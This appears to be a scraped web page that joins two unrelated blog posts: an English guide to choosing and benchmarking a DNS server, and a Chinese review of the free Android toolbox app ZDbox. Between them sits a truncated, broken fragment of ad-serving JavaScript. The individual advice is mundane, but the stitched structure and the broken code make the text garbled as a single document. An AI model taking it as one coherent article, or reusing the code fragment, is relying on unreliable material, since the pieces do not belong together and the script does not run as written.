Which DNS Server Should You Use On Your Computer?

The job of a DNS server is to translate domain names (like google.com) into IP addresses (like 209.85.135.103) and it does this for every new new site that you visit in the browser. Therefore, no matter how fast your Internet connection speed is, a site won't load unless the DNS server has performed the lookup successfully.

When it comes to choosing a DNS server, you've several choices. There are public DNS services like OpenDNS and Google DNS or you could use the DNS Server of your ISP itself. To find your current DNS server, type 『ipconfig /all' at the command prompt and look for the 「DNS Server」 entry under Ethernet adapter.

The speed at which a DNS server can resolve domain names into IP addresses depends on its geographic location among other factors. Therefore, for example, OpenDNS could be the fastest performing DNS server for a user in location A but Google DNS could be a better choice for another user in location B.

Compare DNS Speed

If you would like to know which is the fastest DNS Server for your computer, there's a free utility called DNS Benchmark that can help. It will test the speed of all the popular DNS Services, including OpenDNS and Google DNS, from your computer and then arranges them in the decreasing order of performance.

The bars represent the average time it takes for a DNS service to resolve web domain names into their equivalent IP addresses and thus, the lower the better. DNS Benchmark is Windows-only but Namebench is a good option if you are on Linux or Mac. For some reason, I could not get Namebench to work on Windows 7. [via Cali Lewis]

One more thing..

Most DNS services offer resolvers at two IP address - for instance, Google DNS is available at 8.8.8.8 and 8.8.4.4 – and they are used in the same order in which they are listed in your network settings.

You should therefore look at the performance of individual DNS servers and set the 「Preferred DNS Server" as the one that has the lowest score. In fact, you may also mix servers – like you can use Google Public DNS as the Preferred DNS server and OpenDNS as your Alternate DNS server.

The following video describes how you may change the DNS settings on your computer:

' + google_ads[i].line1 + '' + google_ads[i].visible_url + '
' + google_ads[i].line2 + ' ' + google_ads[i].line3 + ' '; if (i   '; } u = '
Ads by Google ' + u + '
'; } google_adnum = google_adnum + google_ads.length; document.write(u); return; } google_ad_client='pub-3152670624293746';google_ad_output = 'js';google_ad_type = 'text';google_feedback = 'on';google_language = 'en';google_encoding = 'utf8'; google_max_num_ads = '2'; google_ad_channel='4355338828';google_skip=google_adnum;

[Android]超好用的工具大集合---「ZDbox 正點工具箱」

Android有很多工具軟體都很好用,但是每次都要一個一個安裝,有點浪費系統資源,最重要的是很多還要花錢購買才能下載,之前有位噗友介紹了一個不錯用的系統工具---「ZDbox」,但當時作者只在XDA發表並沒有在Android Market上架所以我就沒拿出來寫,最近「ZDbox」已經在Market上架了,而且還是完整中文化介面,重點是「免費」!!所以今天要推薦的就是這套ZDbox:

首先至Android Market搜尋「ZDbox」並下載(FREE):
01.jpg02.jpg

「ZDbox」下載後有一個響亮的中文名字「正點工具箱」執行的方法有兩個,一個是直接執行,另一個是直接從上方狀態列往下拉直接從狀態列表中執行:
nEO_IMG_2011-03-25-17-51-45.jpgnEO_IMG_2011-03-25-17-51-50.jpg

開啟「正點工具箱」,進入程式主選單主要有「電量工具」、「上網流量」、「免打擾」、「程式鎖」、「任務管理」、「軟體管理」等選項:
nEO_IMG_2011-03-25-17-51-56.jpgnEO_IMG_2011-03-25-17-52-14.jpg

「電量工具」可以在工具列顯示剩餘電量,詳細訊息可以看到各裝置使用的電量:
nEO_IMG_2011-03-25-17-52-18.jpg2011-03-25-19-06-04.jpg  

「上網流量」可以統計行動網路的流量,如果沒有辦上網吃到飽來說很實用:
nEO_IMG_2011-03-25-17-52-31.jpg

「免打擾」可以設定特定時間進入飛行模式或靜音模式,讓您在放假的時候不受打擾:
nEO_IMG_2011-03-25-17-52-41.jpg

「程式鎖」可以讓您將指定APP上鎖,以防有人使用有私密資料的軟體,首先選擇一個要上鎖的軟體:
nEO_IMG_2011-03-25-17-52-52.jpgnEO_IMG_2011-03-25-17-53-13.jpg

設定密碼後記得要「開啟」:
nEO_IMG_2011-03-25-17-53-22.jpg2011-03-25-17-53-31.jpg

這個時候程式鎖功能就被啟用了,之後使用選定的程式就必須輸入密碼後才能使用:
nEO_IMG_2011-03-25-17-53-37.jpg2011-03-25-19-04-16.jpg

「任務管理」可以關閉不使用的背景軟體:
nEO_IMG_2011-03-25-17-53-43.jpg

「軟體管理」可以將程式搬移到記憶卡(需Android 2.2)也可以一次移除數個軟體,筆者以移動程式為例,先點選「批量移動程式」,程式會顯示所有支援APP2SD的程式:
nEO_IMG_2011-03-25-17-53-53.jpgnEO_IMG_2011-03-25-17-54-02.jpg

選定要搬移的軟體後點選「移動所有選中的」,就可以將程式搬到SD卡:
nEO_IMG_2011-03-25-17-54-17.jpgnEO_IMG_2011-03-25-17-54-27.jpg

如果您覺得「正點工具箱」只有這樣就錯了,他還可以設Widget到桌面,大的正點工具欄會有10個裝置開關設定可以選擇:
2011-03-25-18-59-11.jpg2011-03-25-18-59-20.jpg

小的正點工具欄可以自選五種硬體功能功能配置在桌面,非常方便:
2011-03-25-18-59-39.jpg2011-03-25-19-00-14.jpg

「正點工具箱」幾乎包含了日常Android手機會用到的實用功能,加上他是免費軟體,筆者強力推薦大家下載來測試看看。

下載QR Code:
2011-03-25-18-36-57.jpg